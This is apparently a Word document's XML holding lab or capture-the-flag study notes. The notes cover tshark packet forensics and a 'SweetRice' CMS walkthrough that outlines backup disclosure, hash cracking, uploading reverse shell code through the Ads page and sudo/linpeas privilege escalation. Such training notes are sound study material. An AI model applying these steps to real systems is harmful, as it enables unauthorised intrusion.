    <w:p w14:paraId="7ACF72D1" w14:textId="053E8862" w:rsidR="000B6C33" w:rsidRDefault="000B6C33" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B02C54F" w14:textId="496EC7D2" w:rsidR="000B6C33" w:rsidRDefault="000B6C33" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>review packets for detection of file path traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F4A871" w14:textId="70D25A5A" w:rsidR="000B6C33" w:rsidRDefault="000B6C33" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>/etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E11F77" w14:textId="6D7F4BE8" w:rsidR="000B6C33" w:rsidRDefault="000B6C33" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>possibly review password cracking using JtR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47900788" w14:textId="27F5AFAC" w:rsidR="000B6C33" w:rsidRDefault="000B6C33" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Port Filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17612AB6" w14:textId="2F5CEF34" w:rsidR="000B6C33" w:rsidRDefault="000B6C33" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>determine what was done on each port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B516EBE" w14:textId="3E49C13F" w:rsidR="000B6C33" w:rsidRDefault="000B6C33" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>creation of backdoors, executables, ssh-keygen use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477D9578" w14:textId="1FCF0108" w:rsidR="000B6C33" w:rsidRDefault="000B6C33" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Compromise Code Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636761CD" w14:textId="22CA7A1B" w:rsidR="000B6C33" w:rsidRDefault="000B6C33" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>main file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBB2C42" w14:textId="702F3F93" w:rsidR="000B6C33" w:rsidRDefault="000B6C33" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>verifyPass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA6DD1E" w14:textId="7478C87B" w:rsidR="000B6C33" w:rsidRDefault="000B6C33" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>hashes, salts, strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B00820" w14:textId="02373F8C" w:rsidR="001668E9" w:rsidRDefault="001668E9" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>hash identifier tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8D97EE" w14:textId="4703C98B" w:rsidR="001668E9" w:rsidRDefault="001668E9" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>hashcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7757B3A2" w14:textId="19724D72" w:rsidR="001668E9" w:rsidRDefault="001668E9" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;hash_value&gt;:&lt;salt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5111C230" w14:textId="3024A161" w:rsidR="001668E9" w:rsidRDefault="001668E9" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084FCA94" w14:textId="1287C020" w:rsidR="001668E9" w:rsidRDefault="001668E9" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SSH login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE253C7" w14:textId="3E097A73" w:rsidR="001668E9" w:rsidRDefault="001668E9" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>.ssh folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAB5FC1" w14:textId="4ADC3917" w:rsidR="001668E9" w:rsidRDefault="001668E9" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>GTFOBins + sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D870D8E" w14:textId="6F0CE242" w:rsidR="001668E9" w:rsidRDefault="001668E9" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F653CC">
        <w:t>shark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1105379C" w14:textId="01428C6A" w:rsidR="001668E9" w:rsidRDefault="00F653CC" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>determining largest packet sources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71117F65" w14:textId="458AA96F" w:rsidR="00F653CC" w:rsidRDefault="00F653CC" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>tshark -r &lt;file.pcapng&gt; -T fields -e ip.dst | sort | uniq -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7392D852" w14:textId="6D21A846" w:rsidR="00F653CC" w:rsidRDefault="00F653CC" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>after detecting useful IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F417B71" w14:textId="287FFB53" w:rsidR="00F653CC" w:rsidRDefault="00F653CC" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>tshark -r &lt;file&gt; ip.dst=&lt;ip addr&gt; | head</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D96C1A" w14:textId="4DD90496" w:rsidR="00F653CC" w:rsidRDefault="00F653CC" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>review GETs and POSTs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1991D4EC" w14:textId="6881F889" w:rsidR="00F653CC" w:rsidRDefault="0052339E" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>export all objects (pieces of data transmitted across a network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D288020" w14:textId="070BA8CE" w:rsidR="0052339E" w:rsidRDefault="0052339E" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>tshark -r &lt;file&gt; - -export-objects “http,http-objects”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65578854" w14:textId="46CF307E" w:rsidR="0052339E" w:rsidRDefault="0052339E" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>output contents of a particular object/file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15843428" w14:textId="7EE64184" w:rsidR="0052339E" w:rsidRDefault="0052339E" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cat http-objects/&lt;filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626C721E" w14:textId="1BF0A472" w:rsidR="0052339E" w:rsidRDefault="00D67C04" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>filter output for a specific port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E1711E" w14:textId="010AD42E" w:rsidR="00D67C04" w:rsidRDefault="00D67C04" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>tshark -r &lt;file&gt; -Y ‘ip.src==&lt;ip&gt; and ip.dst==&lt;ip&gt; and tcp.port==&lt;port&gt;’ -T fields -e tcp.payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177A8CD4" w14:textId="58D57272" w:rsidR="00D67C04" w:rsidRDefault="00D67C04" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>convert output from hex to ascii using xxd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F945390" w14:textId="7FFBB19D" w:rsidR="00D67C04" w:rsidRDefault="00D67C04" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>same command as above followed by | xxd -r -ps &gt; port-out.bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D9E28C" w14:textId="7FE37A74" w:rsidR="00D67C04" w:rsidRDefault="00D67C04" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>this will reveal commands input over the network shell used (such as nc shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DDAAC0" w14:textId="2C3CC77C" w:rsidR="00D67C04" w:rsidRDefault="00D67C04" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can swap src and dst address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE09236" w14:textId="08A2D089" w:rsidR="00BA6E37" w:rsidRDefault="00BA6E37" w:rsidP="00BA6E37">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E04FA32" w14:textId="3D8A59E1" w:rsidR="00BA6E37" w:rsidRDefault="007A4DF1" w:rsidP="00BA6E37">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SweetRice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA6EC1E" w14:textId="3A28949E" w:rsidR="007A4DF1" w:rsidRDefault="00BE7F88" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DA4EC2" w14:textId="0EF0B115" w:rsidR="00BE7F88" w:rsidRDefault="00BE7F88" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C63876" w14:textId="4B0596B9" w:rsidR="00BE7F88" w:rsidRDefault="00BE7F88" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Nikto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307420C8" w14:textId="1F36866F" w:rsidR="00BE7F88" w:rsidRDefault="00BE7F88" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Gobuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D01D22" w14:textId="39BDFAA5" w:rsidR="00BE7F88" w:rsidRDefault="00BE7F88" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48455D63" w14:textId="2694F702" w:rsidR="00BE7F88" w:rsidRDefault="00BE7F88" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SweetRice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD4C77E" w14:textId="12298593" w:rsidR="00BE7F88" w:rsidRDefault="00BE7F88" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">changelog.txt </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> determine version of CMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF6208F" w14:textId="11703C12" w:rsidR="00BE7F88" w:rsidRDefault="00BE7F88" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>searchsploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BD2E45" w14:textId="055F1197" w:rsidR="00BE7F88" w:rsidRDefault="00BE7F88" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Backup Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B328348" w14:textId="0B6D367C" w:rsidR="00BE7F88" w:rsidRDefault="00BE7F88" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>download backups such as mysql backups and review for possible username:login discovery, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CFEB17" w14:textId="23DACA6D" w:rsidR="00BE7F88" w:rsidRDefault="00BE7F88" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>INSERT statement with serialized PHP Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9482E7" w14:textId="0057A7A3" w:rsidR="00BE7F88" w:rsidRDefault="00BE7F88" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>break hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC6BBF5" w14:textId="6D75861A" w:rsidR="00BE7F88" w:rsidRDefault="00BE7F88" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>admin login pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A67B12" w14:textId="3FFAAC74" w:rsidR="00BE7F88" w:rsidRDefault="00BE7F88" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>look for potential reverse shell upload points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB6A33A" w14:textId="32C0F5CC" w:rsidR="00BE7F88" w:rsidRDefault="00BE7F88" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Ads page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA256C5" w14:textId="3CF5587C" w:rsidR="00BE7F88" w:rsidRDefault="00BE7F88" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>copy paste reverse tcp shell code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B505F9F" w14:textId="6810EFD4" w:rsidR="00BE7F88" w:rsidRDefault="00BE7F88" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>open nc listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCD8B7A" w14:textId="673DA917" w:rsidR="00BE7F88" w:rsidRDefault="00BE7F88" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>navigate to Ad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438CCBB8" w14:textId="4731D53F" w:rsidR="00BE7F88" w:rsidRDefault="007A6E65" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink w:history="1">
        <w:r w:rsidR="00BE7F88" w:rsidRPr="00DA68C3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;victim</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BE7F88">
        <w:t xml:space="preserve"> ip&gt;/content/inc/ads/&lt;shellname&gt;.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCEABA6" w14:textId="20D621CA" w:rsidR="00BE7F88" w:rsidRDefault="00BE7F88" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DB06F1" w14:textId="762C5D5F" w:rsidR="00BE7F88" w:rsidRDefault="00BE7F88" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0709FD" w14:textId="0180B2F4" w:rsidR="00283D50" w:rsidRDefault="00283D50" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>linpeas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415DF349" w14:textId="528BB92F" w:rsidR="00283D50" w:rsidRDefault="00283D50" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>look for file execution privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554C2048" w14:textId="37CD104A" w:rsidR="00283D50" w:rsidRDefault="00283D50" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>insert reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F6BE19" w14:textId="45FD4F37" w:rsidR="00283D50" w:rsidRDefault="00283D50" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>open another nc listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D4CAAC" w14:textId="5555346B" w:rsidR="00283D50" w:rsidRDefault="00283D50" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>run file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C8CBE1" w14:textId="06E724FA" w:rsidR="00283D50" w:rsidRDefault="00283D50" w:rsidP="00283D50">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="701D1561" w14:textId="05BDE9D5" w:rsidR="00283D50" w:rsidRDefault="00583FE3" w:rsidP="00283D50">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Agent Sudo</w:t>
      </w:r>
    </w:p>
